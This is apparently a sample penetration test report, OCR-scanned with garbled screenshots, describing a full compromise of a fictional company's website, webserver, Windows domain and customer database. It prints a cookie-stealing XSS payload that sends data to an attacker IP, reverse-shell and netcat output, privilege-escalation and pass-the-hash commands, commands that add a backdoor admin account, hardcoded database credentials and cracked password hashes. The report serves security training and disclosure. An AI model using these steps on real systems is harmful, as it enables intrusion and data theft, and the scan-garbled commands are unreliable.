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Executive Summary 

Offensive Security has been contracted to conduct a penetration test against Archmake's external web 
presence. The assessment was conducted in a manner that simulated a malicious actor engaged in a 
targeted attack against the company with the goals of: 

o Identifying if a remote attacker could penetrate Archmake's defenses, 
o Determining the impact of a security breach on: 

o The integrity of the company's order systems. 

o The confidentiality of the company's customer information. 

o The internal infrastructure and availability of Archmake's information systems. 

The assessment was conducted in accordance with the recommendations outlined in NIST SP 800-115 1 . 
The results of this assessment will be used by Archmake to drive future decisions as to the direction of 
their information security program. All tests and actions were conducted under controlled conditions. 

Summary of Results 

Network reconnaissance was conducted against the address space provided by Archmake with the 
understanding that this space would be considered the scope for this engagement. It was determined 
that the company maintains a minimal external presence, consisting of an external web site and a 
hosted mail service. This constituted a small attack surface, necessitating a focus on the primary 
website. 

While reviewing the security of the primary Archmake website, it was discovered that a vulnerable 
WordPress plugin was installed. This plugin was successfully exploited, leading to administrative access 
to the WordPress installation. This access was utilized to obtain interactive access to the underlying 
operating system, and then escalated to root privileges. 

Armed with administrative access to the Archmake webserver, Offensive Security was then able to 
identify internal network resources. A vulnerability in an internal system was leveraged to gain local 
system access, which was then escalated to domain administrator rights. This placed the entire 
infrastructure of the network under the control of the attackers. 



1 http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf 
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While mapping the internal network, an application was discovered that accessed an internal corporate 
database. The application was compromised, and in doing so, allowed Offensive Security to gain access 
to the internal database where customer information is stored. Additionally, it was found that this 
database system manages customer orders. This system was used to process returns on attacker- 
controlled credit cards, allowing Offensive Security to extract funds directly from the company. 
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Attack Narrative 

WordPress Exploitation 

While conducting discovery against the target systems it was discovered that a WordPress 3.3.1 
installation was in place. While this system was being reviewed for security issues, the WPScan 2 tool was 
used, which reported that an insecure plugin was in place. 

./wpscan.rb --url www.Archmake.com --enumerate p 

~\ n / i 

\ \ A / / I l_) I ( 

\ \l \l I I / \ \ / _\l J I '_ \ 

\ /\ / II ) I (_l (J I I I I 

\/ \/ l_i I / \ l\ , J J l_l vl.l 

WordPress Security Scanner by ethicalhack3r.co.uk 
Sponsored by the RandomStorm Open Source Initiative 

I URL: http://www.Archmake.com/ 

| Started on Tue Jan 24 18:44:49 2012 

[ ! ] The WordPress theme in use is called "twentyeleven" . 

[!] The WordPress "http://www.Archmake.com/readme.html" file exists. 

[!] WordPress version 3.3.1 identified from meta generator. 

[+] Enumerating installed plugins . . . 

Checking for 2892 total plugins... 100% complete. 

[+] We found 2 plugins: 
Name: relevanssi 

Location: http:// www . Archmake . com/wp- con tent /plugins / relevanssi/ 
Directory listing enabled? Yes. 
Name: relevanssi 

Location: http:// www . Archmake . com/ wp- con tent /plugins / relevanssi/ 
Directory listing enabled? Yes. 

[+] There were 1 vulnerabilities identified from the plugin names: 
[!] Relevanssi 2.7.2 Wordpress Plugin Stored XSS Vulnerability 
* Reference : http : //www. exploit-db . com/exploits/16233/ 

[+] Finished at Tue Jan 24 18:45:30 2012 

As reported by WPScan, the Relevanssi plugin suffered from a Cross-Site Scripting Vulnerability 3 , 
documented on the Exploit Database. The aforementioned vulnerability was leveraged to conduct a 
Cross-Site Scripting attack, with the intent of stealing authentication cookies from an administrative 
user. 



http://code.google.eom/p/wpscan 
http://www.exploit-db.com/exploits/16233/ 
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To conduct this attack, Offensive Security inserted the following code into the search bar on the 
Archmake web site: 



<script>new 

Image ( ) . src="http ://172.16.40.204/p. php?cookie= "+document . cookie ; </script> 



<scri pt >■ n ew I mag e() . s re = " r 



Search j 



For this attack to properly execute, a user logged into the WordPress administrative interface was 
required to access the "User Searches" page. 



0 Dashboard 



Home 

Up-dates 

User searches 



When this page was accessed, the cross-site scripting attack was executed. This can be verified by 
accessing the view source option on the "User Searches" page. 



;scr ipt>new Image ( > . sre" "http://172 . 16 . 40 . 204 /p . php? cookie" "+ document . cookie ; < /script 



At the time that the "User Searches" page was accessed, a remote listener was running on the attacker's 
machine. This captured the logged in user's authentication cookie. 
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GET 

/p.php?cookie=wordpress_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1328098588 
%7C72c3335adle7 83b7 5bb3d8cf 9e85fc9c; %2 0wp-settings-time- 

1=1327925790 ; %20wordpress_test_cookie=WP+Cookie+check; %20wordpress_logged_i 
n_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1328098588%7Caf Ibcabca49191de76e 
c45e798ae5ada; %20wp-settings- 

l=editor%3Dhtml; %2 0wordpress_ed8a4e5dd813c7b5d2 62130b08955a6a=admin%7C132 7 5 
99469%7C3ada64cf 8e918c9a4bf 148896 18 If c63 ; %2 0wordpress_logged_in_ed8a4e5dd81 
3c7b5d262130b08955a6a=admin HTTP/1 . 1 

This cookie was then manually inserted into Firefox using a cookie editor. This bypassed the login 
function by tricking WordPress into believing the attacker had already successfully authenticated to the 
system. 



Name: |^ wordpFess_edSa4e5ddS13c7b5d262130bOS955a6.a 



Name: 




Content: 




Host: 


@) 


Path: 




Send For: 




Http Only: 





www.archmake.com 



Expires: 



at end of session 



Save as new | Save J [ Close 



After reloading the web page, it was verified that administrative access had successfully been obtained. 
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► ] □ vVvVVV. 


archmake.com 






~Q) [*] 1 












+ New 


Edit Page 


Howdy, admin 






We Know Our Morphine 
Home Drug Bunnies Manufacturing 



Once this level of administrative access was obtained, full control via the WordPress administrative 
interface was possible. This can result in code execution on the site through multiple methods, most 
directly through the editing of the WordPress theme files, which grant access to the underlying PHP 
code. The integrity of the webserver was now compromised, with multiple escalation paths available to 
the attacker. 

For details of the exploited vulnerability, please see Appendix A. 

WordPress Plugin Unintended File Type Upload 

Once administrative access to the WordPress system had been obtained, an effort was taken to identify 
any additional vulnerabilities that could be leveraged by an attacker. As part of this effort, a review of 
the installed plugins was made. 

While conducting this review, a plugin was identified that allowed for the uploading of user supplied 
profile images. 



□ 


Plugin 


Description 




□ 


Admin Upload Plugin 


Admin upload plguin 






Deactivate 


Version 0.1 I By 


I Visit plugin site 





Upon reviewing the source code for this plugin, Offensive Security discovered that a regular expression 
controls the types of files that may be uploaded to the site. 
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fy Edit Plug ins 



Browsing admin-upload-plugin/admin-upload-plugin.php (active) 

Seta 



if ( is s_et/i_FILES[ 'off sec_user_image 1 )[ 'error" ] ) S& 
t_FILES[ "off sec_user_iinaga' ] [ ' error ' ] === 0) { 

ffilename ■ $_FILES[ 'of f sec_user_iinage' )[ ' name ' ] ; 
if ( pr_ egjnatc h ( 1 "f"- . *\ . ( bmp | jjp eg | gif | prig | jpg 

%-f ilename) ) { 



The above section of code from the upload script checks for allowed file types in a flawed manner. The 
regular expression performs a simple string evaluation, and is the only test used to determine the file 
type of the object the user is attempting to upload. The intent of the regex is to match a file name such 
as "Mylmage.png", with this highlighted portion of the name equaling the regular expression match. 
However, files such as "MyEvilFile.png.php" would successfully match as well, allowing the upload of an 
executable script. 

It was decided to leverage this vulnerably to upload attacker-supplied tools and scripts to the targeted 
system. There are multiple ways that file transfers could be conducted with the level of access that had 
been obtained, however, it was decided that leveraging this process had the dual benefit of 
demonstrating an existing vulnerability on the site, as well as minimizing the changes made to the 
webserver. 



Name Last modified Siz 

^ Parent Directory 

^ faix.png OJ-Feb-2012 09:55 103! 

g] php-rcvcrsc-shell.pnj;.plip OJ-Feb-2012 10:QQ 5.4: 

Apache/22.16 (Debsan) Server a! www.arehmake .com 



To verify that the upload process worked as intended, a standard graphic file was uploaded as a test. 
Once this was completed successfully, Offensive Security modified the name of a PHP reverse shell (pre- 



Name Last modified Size Descrii 

^ Kircnt Directory 

|^ face .prig Ol-Feb-2012 09:55 103K 

Apache/2.2.16 (Debian) Server at www.archmake.com I 
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configured to connect back to an Offensive Security controlled system so as to not introduce an 
additional security vulnerability) and uploaded it to the system. 



A listener was then run on the attacker-controlled system and the PHP reverse shell was accessed, 
resulting in interactive shell access on the remote system. Because this shell was running within the 
context of the webserver, it only had minimal system permissions. 



root@bt:~# nc -lvp 53 




listening on [any] 53 ... 




connect to [172.16.40.204] from www.Archmake.com [172.16 


.40.1] 34850 


Linux archwww 2.6.32-5-686 #1 SMP Mon Oct 3 04:15:24 UTC 


2011 i686 


GNU/Linux 




10:49:14 up 12 days, 23:47, 2 users, load average: 0. 


00, 0.00, 0.00 


USER TTY FROM LOGINS IDLE JCPU 


PCPU WHAT 


rdole tty7 :0 16Janl2 12days 5:51 


0.24s x-session- 


manag 




rdole pts/2 :0.0 TuelO 6:01m 0.38s 


4 4.68s gnome- 


terminal 




uid=3 3 (www-data) gid=3 3 (www-data) groups=3 3 (www-data) 





For details of the exploited vulnerability, please see Appendix A 

Linux Local Privilege Escalation 

With interactive access to the targeted webserver obtained, the next objective was to gain 
administrative access to the system. 

The operating system of the webserver was determined to be "Linux version 2 . 6 . 32-5-686 
(Debian 2.6.32-38) (ben@decadent.org.uk) (gcc version 4.3.5 (Debian 4.3.5-4) 
) #1 SMP Mon Oct 3 04: 15:24 UTC 2011". After researching potential attack vectors, it was 
discovered that the system was vulnerable to a race condition in bzip2. A publicly available exploit 4 for 
this vulnerability was found on the Exploit Database. 

To escalate privileges, the exploit was uploaded to the system via the insecure upload profile picture 
plugin. 



4 http://www.expoit-db.com/exploits/18147 
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roat@bt:-/c# gcc -o race 18147 . c 
root@bt:-/c# Is -1 race 

-rwxr-xr-x 1 root root 7729 2012-01-28 20:16 race 
root@bfc:-/c# | 



Nil 111 I' 



Last modified Size 



^ Parent Directory 



faccpnt? 01 -Fcb-2012 09:55 I03K 

g] php-revcrsc-shclLpng.php Ol-Feb-2012 10:00 5.4K 
ifll race.pn^z Ol-Feb-2012 10:28 3. IK 



Apache/ 



12.2J6 (Debianj Server at www.archmake.com P 



It was then a straightforward process of decompressing the executable, providing execute permissions, 
and running the exploit. This resulted in root level access, allowing full control of the entire webserver. 



$ cd /var/www/wp-content/uploads/2012/02 

$ Is race.png.gz 

race . png . gz 

$ gunzip race.png.gz 

$ chmod +x race. png 

$ ./race. png 

usage: ./race. png <cmd name> 

$ ./race. png dd 

id 

uid=0(root) gid=33 (www-data) groups=0 (root) , 33 (www-data) 



At this point, the webserver represents an internal attack platform for a malicious party. With full 
administrative access now available, a malicious party could utilize the system for a multitude of 
purposes, ranging from attacks against Archmake itself, to attacks against its customers. If this had been 
a true compromise, Archmake administrators would not be able to trust any data on the webserver. 

For details of the exploited vulnerability, please see Appendix A. 
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Maintaining Access to Compromised Webserver 

Once administrative access to the webserver had been established, further attacks against Archmake 
required a more stable connection than what was provided by the PHP backdoor. 

Upon examining the exploited webserver, it was discovered that an SSH service was running on port 
22000. It was decided that using this service was a better solution for establishing a standard method of 
interaction without introducing additional security vulnerabilities to the system. 

In order to minimize changes to the system, SSH key-based authentication was used for authentication 
rather than altering or adding any user accounts. These keys work as a method of authentication 
through the use of public key cryptography, consisting of a public/private key pair. To enable this access, 
the attacker's public key was added to the authorized_keys file for the root user. Additionally, the public 
key of the web server was copied to the authorized_keys file of the attacking system. 

With the aforementioned authentication system in place, a SSH server was started on the attacker's 
system on TCP port 53. We were confident that the webserver would be able to make outbound 
connections to the remote system using that port based upon the initial exploit. From the PHP shell 
environment, the command 

ssh -o ' StrictHostKeyChecking no' -R 22000:127.0.0.1:22000 
-p 53 172.16.40.204 ping 127.0.0.1 

was executed and initiated a connection from the victim's system to the attacker. Additionally, this 
created a listener on the attacker's system that would tunnel local connections to the listening SSH 
server on the victim's system. 
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This tunnel was then utilized to open a standard SSH connection as the root user to the victim web 
server. Additionally, a SOCKS proxy was created between the two systems, allowing applications on the 
attacker's system to access the victim's network through the proxy. This has the effect of making all 
connections appear as if they are coming from the victim's system. This configuration allowed the 
attacker to masquerade as the victim's system. 

For the purposes of the penetration test, this connection was created manually. In the instance of a true 
attack, it is likely that the attacker would implement an automated process to re-create the tunnels if 
the connection was broken for any reason. 

This phase of the attack did not exploit any vulnerabilities or take advantage of any newly discovered 
misconfigurations on the system. It was simply the result of the level of access that had been obtained 
on the system due to the success of the previous attacks. This phase is where the attacker consolidated 
the necessary access and control, to further penetrate Archmake's network. Clearly understanding this 
aspect, is essential in understanding the scope of the penetration. 

Vulnerable Splunk Installation 

While inspecting the configuration of the compromised webserver, references were discovered to a 
10.10.0.x network that appeared to be directly accessible by the compromised system. Network 
reconnaissance steps, used to discover additional assets located on this secondary network, revealed a 
Splunk server. 

Versions of Splunk prior to 4.2.5 suffer from a remote vulnerability that can be exploited with a publicly 
available exploit 5 located on the Exploit Database. Using the SOCKS proxy that was previously 
established, Offensive Security accessed the web interface of the Splunk installation, and identified that 
the installed version was 4.2.2, and thus, vulnerable to attack. 



5 http://www.exploit-db.com/exploits/18245 
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Login - Splunk 4.2.2 (101277) 



I + imhrcp://10.1O.0.3:B00Ofen-U5faccount/login?return_to= 



C i.Q' Google 



splunk> 



Splunk4.3 is here and it's our best Splunk 

Easier to use, faster more scalable and now mobile. D 



Skip update 



©2005-301 2 Splunk Inc. Splunk 4.2.2 build 101277. 



To conduct the attack, the public exploit was transferred to the compromised webserver, and then run 
against the targeted system. This attack is conducted in a blind manner, resulting in no response back 
from the executed commands. Because the remote system was Windows-based, it was decided that an 
attempt would be made to create a user account on the remote system. As Splunk is often installed with 
local SYSTEM privileges, this user would then be added to the Administrators group. 
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root@archwww: ~/exploit# python splunk_exploit . py -h 
Usage: Run splunk_exploit . py -h to see usage options 
Options : 

show program's version number and exit 
show this help message and exit 
IP Address or hostname of target splunk server 
Generate CSRF URL only 

Target is configured to use a Free licence and does 



— version 

-h, — help 

-t TARGETHOST 

-c 

-f 



not 



permit remote auth 

The Splunk admin interface port (Default: 8000) 



The Splunkd Web API port (Default: 8089) 
File containing usernames for use in dictionary attack 
File containing passwords for use in dictionary attack 
Admin username (if known) 
Admin pasword (if known) 

Attempt to add admin user via priv up directory 



-W SPLUNKWEB_PORT 
-d SPLUNKD_PORT 
-u USERFILE 
-p PASSFILE 
-U USERNAME 
-P PASSWORD 
-e USERPAIR 
traversal 

magic. Accepts username : password 
root@archwww: ~/exploit# python splunk_exploit . py -t 10.10.0.3 -i 
[i] Splunkd server found. Version : 4 . 2 . 2 
[i] OS: Windows 0 6 

[i] Splunk web interface discovered 
[i] CVAL: 1480339707 

[i] Configured with free licence. No auth required 

[Payload Options] 

[1] Pseudo Interactive Shell 

[2] Perl Reverse Shell 

[3] Command Exec (Blind) 

Please select option 1-3:3 

blind_shell>net user hacker tOOrtOOrtOOr ! /add 

[i] Executing Command:net user hacker tOOrtOOrtOOr ! /add 

net user hacker tOOrtOOrtOOr! /add 

blind_shell>net localgroup administrators hacker /add 

[i] Executing Command: net localgroup administrators hacker /add 

net localgroup administrators hacker /add 



The success of the attack was tested by attempting to use the newly created account to establish an 
interactive session on the targeted system via Windows Remote Desktop. 
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With this connection established, we verified that the created account had local administrative access. 
At this point, Offensive Security had a level of access equal to sitting at the physical system console of 
the newly compromised host. 

For details of the exploited vulnerability, please see Appendix A. 

Domain Privilege Escalation 

To determine the full potential of this compromise, an attempt was made to escalate privileges from 
local administrator to domain administrator. Utilizing the compromised Splunk server, Offensive 
Security transferred Windows Credential Editor (WCE) 6 to the remote system through the use of the 



6 http://www.ampliasecurity.com/research/wcefaq.html 
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compromised webserver. WCE is a tool that allows attackers to make use of Windows credentials from 
memory and repurpose them for alternate use. 

Upon initial transfer of the WCE toolkit to the system, it was discovered that the Domain Administrator 
token was present within memory. 



c-\. Administrator: Command Prompt I BUI ftf* 

D 

C : SUsersShackerSDown loads >wce . exe i — 
WCE vl.2 < Windows Credentials Editor> - <c> 2010,2011 Amplia Security - by Herna| 
n Ochoa <hernanGanpliasecurity.com> ||§1 
Use —h for help. |||| 

fldministrator:flPCHMflKE:7191887D06385FE04D080AE3B95CB89D:598fl0FC45B201E216D9BElflDB 
E9398436 ®M 
ft RCHMOKE-DHCP$:flRCH MAKE: 00000000000000000000000000000000 :28Efl4CC2836CE4220DF4CB0B 
H9C4E6FF0 §§| 

C : \Users\liacker\Down loads >_ 111 



With this credential in memory, it was a simple matter of using this token to execute a new command 
shell that would operate with Domain Administrator rights. 
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Administrator: Command Prompt 



n x 



C : \UsersShacker\Doun loads >wce . exe 
UCE ul.2 (Uindous Credentials Editor> 
n Ochoa (hernanPampliasecurity .com> 
Use — h for help. 



<c> 2010,2011 Amplia Security - by Herna 



Admin istrator : ARCH MAKE : 7191887D06385FE04D080AE3B95CB89D : 598 A0FC45B201E216D9BE1 AD 
59398436 

ARCH MAKE-DHCP$ : ARCH MAKE: 00000000000000000000000000000000 :28EA4CC2836CE4220DF4CB0 
A9C4E6FF0 



C:\UsersNhackerSDoun loads >uce -s Administrator : ARCHMAKE:7191887D06385FE04D080AE3 
B95CB89D:598A0FC45B201E216D9BE1AD59398436 -c end. exe 

UCE ul.2 (Uindous Credentials Editor> - <c> 2010,2011 Anplia Security - by Herna 
n Ochoa (hernanPampliasecurity .com> 
Use — h for help. 



Changing NTLH credentials of new logon session 000C435Bh to: 
Username: Administrator 
domain: ARCH MAKE 

LMHash: 71 9 1 8 8 7DB6 3 8 5 FE04D08 0AE3B95CB89D 
NTHash: 598A0FC45B201E216D9BE1AD59398436 

HTLM credentials successfully changed? ^^^^^^^^^^^^^^^^^ 
C : \Users\hacker\Doun loads > 



c-\. Ad in in istrator: C:\Windows\sy5teni32\cnid.exe I | f~ 
Microsoft Uindous [Version 6.0.6002] 

Copyright <c> 2006 Microsoft Corporation. All rights reserved. r— 

C : \Uindous\system32 >_ §§| 



This shell was then used to run the Microsoft Management Console (MMC) as the Domain 
Administrator. With the MMC loaded, the Active Directory Users and Computers snap-in was loaded, 
giving the attacker the ability to edit domain entities. This was utilized to create a new network user, 
which was subsequently added to the Domain Administrator's group. 
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Console 1 - [Console Root] 



File Action View Favorites Window Help 



* m & li 


Console Root 

- i Active Directory Users 

El _ Saved Queries 
El ^ archrnake.com 
E [IB ArchmakeOrg 
E Ql Builtin 
E _ Computers 
E _= Domain Contro 
E l3 ForeignSecurifr 
E -1 Microsoft Exch; 
E Q USers 

.1 1 H 


Name 


Actions 


, Active Directory Users and Compu. . . 


Console R 

More f 





i 



■\. Administrator: C:\Windows\svstem32\cnid.exe 



icrosoft U in do us [Uersion 6.0.6002] 

opyright <c) 2006 Microsoft Corporation. All rights reserved. 
: \U in do ws \s ys t e m3 2 >mmc 




This new user was capable of accessing the entire Archmake Active Directory domain, with full rights 
and privileges. At this point, the integrity of the entire Windows network is compromised. In terms of 
next steps, a true attacker would have multiple tools at their disposal, including: 

o Utilization of Group Policy to deploy backdoor software on all systems. 

o Complete exfiltration of all data stored on any system that uses Windows authentication. 

o Destruction of any and all network resources. 

o Targeted attacks against any and all employees of Archmake, through the use of information 
gathering tools such as keystroke loggers to identify personal information. 

o Leveraging this systemic access to conduct attacks against Archmake suppliers and partners that 
maintain a trust relationship with the company. 

It was determined that while these steps would be possible, they would be considered outside the scope 
of the current engagement. It was demonstrated that a total compromise of the Archmake domain had 
been accomplished with a complete loss of integrity for all local systems. 



For details of the exploited vulnerability, please see Appendix A. 
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Database Content Exploitation 

After the Splunk server was exploited, an examination of its local file systems revealed a directory 
containing an executable and a CSV file. 



|cT| C:\Window5\sy5tem3Z\cmd.exe 

C : \0r de r Man ag e me n t >d ir 
Uolume in drive C has no label. 
Uolume Serial Number is 58BE-8E5C 



Directory of C:\OrderManagement 



01/30/2012 05:16 AM <DIR> 
01/30/2012 05:16 AM <DIR> 

01/30/2012 05:16 AM 71,199 Curren t Export .csu 

01/30/2012 04:25 AM 479,544 exportcsu.exe 

2 File<s> 550,743 bytes 

2 Dir<s> 2,072,174,592 bytes free 



C : \0r de r Man age me n t >_ 



Upon investigating the CSV file, it was found to contain Archmake's customer information that had been 
extracted from a database server. 



File Edit Format View 



QjrrentExport.csv - Notepad 



Help 



LJn 



Message: [Microsoft] [ODBC SQL Server Driver] [SQL Ser ver]Changed database context to 'Customer Data' 
EQLSTATE: 01000 

l; l; l; l; l; l; 

Aaron; Adams; 123 main street ; i mpossi bl e dragon boxi ng; Al abama; 39108; 

Adam; Adamson; 123 main street; stunni ng sage maneuver ; Al aska; 54548; 

Adri an; Adl er ; 123 main street; runni ng fox-woman bite; Ari zona; 95471; 

Al an; Akers; 123 main street; lucky mantis knee; Arkansajs; 54250; 

Al ejandro; Aki n; 123 main street; di rty wi nd punch; cal if orni a; 38612; 

Al ex; Al eman; 123 main street; yel 1 ow emperor's fairy knif e;Colorado; 64608; 

Al 1 en; Al exander ; 123 main street; mongoli an eagle heel ; connecti cut; 53408; 

Andrew; Al 1 en; 123 main street; naughty shaolin crush; Del aware; 72955; 

Andy; Al 1 i son; 123 main street; mongol i an immortal touch; Fl ori da; 30209; 

Anthony; Al Iwood; 123 main street; yel 1 ow emperor's death charge; Georgi a; 39555; 

Art; Anderson; 123 main street; i nnocent eagle spear ; Hawai i ; 53535; 

Arthur ; Andreou; 123 main street; amazi ng orchid pose; Idaho; 7431B; 

Barry; Anthony; 123 main street; fortunate rat forehead; il 1 i noi s; 46975; 

Bart; Appel baum; 123 main street;no tiger arrow; Indiana; 30372; 

Ben; Apo 1 egate; 123 main street; pious Buddha assault; Iowa; 20142; 

Beniami n; Arbore; 123 main street;evil plum-blossom shi el d; Kansas; 77573; 

Bi 1 1 ; Arenson; 123 main street; fi erce rooster contact; Kentucky; 19218; 

Bobby; Armol d; 123 main street; respl endent monkey throw; Loui si ana; 13690; 

Brad; Arntzen; 123 main street; i inverted cat contact; Mai ne; 31500; 

Br adl ey; Askew; 123 main street; dreaded wind scare; Maryl and; 89274; 

Brendan; Athanas; 123 main street; honorabl e killer knee; Massachusetts; 40454; 

Brett ; Atki nson; 123 main street; fi erce eunuch hammer ; Mi chi gan; 71708; 

Bri an; Ausman; 123 main street; three snake stance; Mi nnesota; 34756; 

Bruce; Austi n; 123 main street; unfathomabl e monk fury; Mi ssi ssi ppi ; 97137; 

Br yan; Av eritt ; 12 5 main street ; runni ng tiger technique; Mi ssouri ; 50408; 
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It was determined that this file was generated by the exportcsv.exe program. This program was 
examined to obtain an understanding of its inner workings, and to determine if it contained any 
information that would facilitate access to the database server. 

While viewing the program within a debugger, it was discovered that it created a direct connection to a 
Microsoft SQL server. The credentials for this connection were hard coded within the application. 



Oily Dbg - exportcsv.exe - [CPU 1 - main thread, module exportcs] 



[c] File View Debug Plugins Options Window Help 



8848 14F3 
8848 14FS 
8848 UFA 
88481582 
8848 158A 
88481512 
8848151S 

88481524 



.v74 85 JE SHORT en port cs. 88481 4FA 

. -E9 E48388B8 JMP ewportcs. 8B481S4E 

c 74424 n: iiu" : :.rd ftp r t. : ce-tf + 1 ■: : . o 

. C 74424 12 ■«■«-< llu" C jRO F-TF: 22: [E2F + 12], i"i 

. C74424 14 88S.M0U DWORD PTR SS: CESP+14] , 48S 

. 8D85 E8FBFFFF LEA EflX, DWORD PTR SS: CEBP-41S] 

. 894424 18 MOU DWORD PTR SS: CESP+1S] , EflX 

. i:74424 >X FDFIIlMii [ jRD FTF: 22: [E2F+L Dj-jj 

. C74424 88 1801 MOU DWORD PTR SS : C ESP+8 ] , en port cs . 084481 ASCI I "DRIUER={SQL Server): SERUER=18. 18. 0. 5, 1433:DATABAS 

. C74424 04 0801 MOU DWORD PTR SS: [ESP+4: , 0 

. 8E4S F0 MOU EAX, DWORD PTR SS: CEBP-18] 



084400ia=eKportcs. 00448818 (ASCII "DRIUER={SQL Seruer}; SERUER=18. 18.0.5, 1433: DATABASE=CustonerData: UID=sa; PWD=of f secl23t f : ") 



By making use of these credentials, it was possible to make a direct connection to the backend database 
server to directly access the data. 



B © 192.16S.114.45 (SQL Server 10 .0.1600 - sa) 
B £j Databases 

B System Databases 
B LtJ Database Snapshots 
J CustomerData 
B CJ Database Diagrams 
B C2 Tables 

B 113 System Tables 
[±i J dbo, accounts 
B M 



dbc.Lustcmerlnfc 



This access allowed us to directly manipulate all data within the database. 
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LH Results Messages 





id 


First Name 


Last Name 


eMail 


Phone Nbr 


AcctNb 


11 


160 


Anthony 


AJIwood 


Anthony (Shotmail .com 


(399)669-2192 


160 


12 


172127 


Art 


Anderson 


Art@hotmail.com 


(844)473336& 


17212 


13 


13^ 


.Arthur 


Andreou 


.ftrthur@hotmail.com 


(311)513-9301 


13434 


14 


634534 


Barry 


.Anthony 


BarryfShotmail.com 


(355)430-3499 


65453 


15 


584965 


Bart 


Appelba... 


Bartf2hotmail.com 


(399)633-3362 


53436! 


16 


465459 


Ben 


Applegate 


Benf3hotmail.com 


(355)416-2751 


46543! 


17 


233170 


Benjamin 


Arbore 


Benjamin fShotmail .com 


(344)733-1054 


233171 


18 


327653 


Bill 


Arenson 


Bill otmail.com 


(333)443-3420 


B2765! 


15 


529136 


Bobby 


Arnold 


Bobby fShotmail .com 


(399)149-3023 


5251 SI 


20 


3S7324 


Brad 


.Antzen 


BradfShotmail.com 


(344)437-1535 


3S732- 



Utilizing this connection, an export of the database was performed. This resulted in a significant 
compromise of customer data. Fields that were extracted included: UserlD, First and Last Name, E-mail 
address, telephone number, encrypted password, mailing address, and various bits of user information. 



Laurel 


Cyprus 


LajrelSaPhotmail <B33J 941-2G44 


936381} LajrelCyprjs 


377bb4BB1 438ao0e€0db-t5b1 Obi 8a7B7 


Lajren 


D'Ascenzo 


Lajren^iotmai (B44) 677-9012 


V.3/.54 LaurenD'Ascan 


74dabdca46291 1 bB45aD£Be48b3d05fc 


Lajr e 


Diabak 


LajreStfho^-na IS-'-IJ 6^6-5797 


B''.298B LaurieDabak 


€6a43d2a3a4cao',01 88e3246d370aB21 


Leah 


Dakou'as 


Leah^hotmaiLc [811 > 87-1-2273 


637337 LeahDakoutaa 


353bd29o64 b5F373931 75a9cB43fflb0b 


Linda 


Daly 


LindajirKstmajl.- [856J 204-B592 


B726D LindaDaly 


B332o2eeaa64620f a7b71 dbtMfadSea 


Lisa 


Dana 


Liaa&hotmail.ci [899) 700-7122 


929*19 LisaDana 


1 2flcB5534e1 2f cb8a553f-'.4 c136ce4e1 


Lori 


Danbdrg 


Lori^hotmail.ce [822J 732-58D4 


B55104 LoriDanburg 


1d2a7b20ae07af3ad2a1 1 c4a5fca7204 


Marcia 


Danenhauar 


MajciaSaPho^Tiai I.822J 789-9682 


920583 MafciaDananha agace1cc2be31f5b97522dB1Fcb69201 


Margaret 


Dariey 


MargarBt&hQirr(B11J 977- , .6D6 


291 21 Mar^anetDarlay f3b31_e94913379J4dMd^ 


Maria 


Dannuzet 


Maria&hotmail. I.856J 06' -2939 


291 E34 MariaDarr-Siiza: 27Bb93b39ee3b5'la2oc1e1 1dfB0c4c37 


Marina 


Dartt 


Marina&hctma: [S33J 22' -1283 


S 76322 MacinaDartt 


6dBe7B343bbdB2a0f3aff 1 aa0b984647 


Marisa 


Daugharty 


MarisaSShotmai 1811 1 4B9-3623 


596448 MariaaDaughar 


B07df cc396f82784Ga9631 b735c7a8DS 


Martha 


Davila 


Martha(3fhQt-naj[[833J 9E0-5688 


154385 MarthaDav Ia 


d6692dd335c3oBb2adD2[}e276Beed82B 


Mary 


Davia 


MarySsPhQE/nalc 1822J 309-2399 


920364 MaryDavts 


04 1 cf7cf23d3d3 72644b7rj750521flft)0 


Mary 


Dawkins 


MaryiJfho-"na'.c [S33J 137^.654 


979349 MaryDawkiris 


e0dc32D9a1 49c3ae58f ab1 49aet7cf3d 


Ann 


Day 


Ann&hctmal.ct [898; -V.'-DGCG 


918726 AnnDay 


G5f9b1 4b94360597595 1 9ea6a1 36791 a 


Maya 


DaHart 


Mayatfhctmail.- 1833) 671 -24C9 


218333 MayaDaHart 


de95b43bceeb4b99Baed4aad5caf1 ae7 



After examining the output, it was determined that the password field was composed of MD5 hashes. 
These hashes were loaded into an Offensive Security operated password cracker. Out of the 1000 
loaded hashes, 996 were recovered to clear text in twenty two seconds of operation. 
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Hashes: 1002 

Unique digests: 1000 

Bitmaps: 13 bits, 8192 entries, OxOOOOlfff mask, 32768 bytes 
Rules: 1 
GPU-Loops: 128 
GPU-Accel: 4 0 

Password lengths range: 1-15 
Platform: AMD compatible platform found 
Watchdog: Temperature limit set to 90c 
Device #1: Cayman, 2048MB, OMhz, 22MCU 
Device #2: Cayman, 2048MB, OMhz, 22MCU 
Device #1: Allocating 132MB host-memory 

Device #1: Kernel . /kernels/4098/m0000_a0 .Cayman. 64 .kernel (1132724 bytes) 
Device #2: Allocating 132MB host-memory 

Device #2: Kernel . /kernels/4098/m0000_a0 .Cayman. 64 .kernel (1132724 bytes) 

Scanned dictionary /pentest/passwords/wordlists/hatelist . txt : 2712389526 
bytes, 232438151 words, 232438151 keyspace, starting attack... 

9d72aa552f 662 852 6ablel93d4aa0f 2b: abode 
7e84b7b8dlc678647abafd23449aldbl :acqua 
79e3d51a81199a960a370f6e4f0ba40c: abnormal 
616efb73c7fc429cd5189f 7f 95d72 74 6 : adige 
8d8bfbdl0b5f6d4 8eb9691bb4 871de62:admit 
3b7770f7743e8f01f0fd807f304a21d0: adjust 
C9fe0bd5322a98e0e4 6ea09d2c319cd2 : aflame 
bda059eld21467e68b86d5b33f f 78fcl : absentminded 
e43fdlf 8 9dbc2 58 fe6 5 Iac8ecaa7a6 la: admonition 



Status : Exhausted 

Input .Mode ... : File ( /pentest/passwords/wordlists/hatelist . txt ) 

Hash. Type. ... : MD5 

Time . Running . : 22 sees 

Time . Left .... : 0 sees 

Time.Util : 22084 . Oms/17923 . 2ms Real/CPU, 430.8% idle 

Speed : 10060.4k c/s Real, 67185. 3k c/s GPU 

Recovered : 996/1000 Digests, 0/1 Salts 

Progress : 232438151/232438151 ( 100.00%) 

Rejected : 10264581/232438151 (4.42%) 

HW. Monitor. #1 : 0% GPU, 51c Temp 
HW. Monitor. #2 : 0% GPU, 44c Temp 



Started: Tue Jan 31 13:43:05 2012 
Stopped: Tue Jan 31 13:43:37 2012 



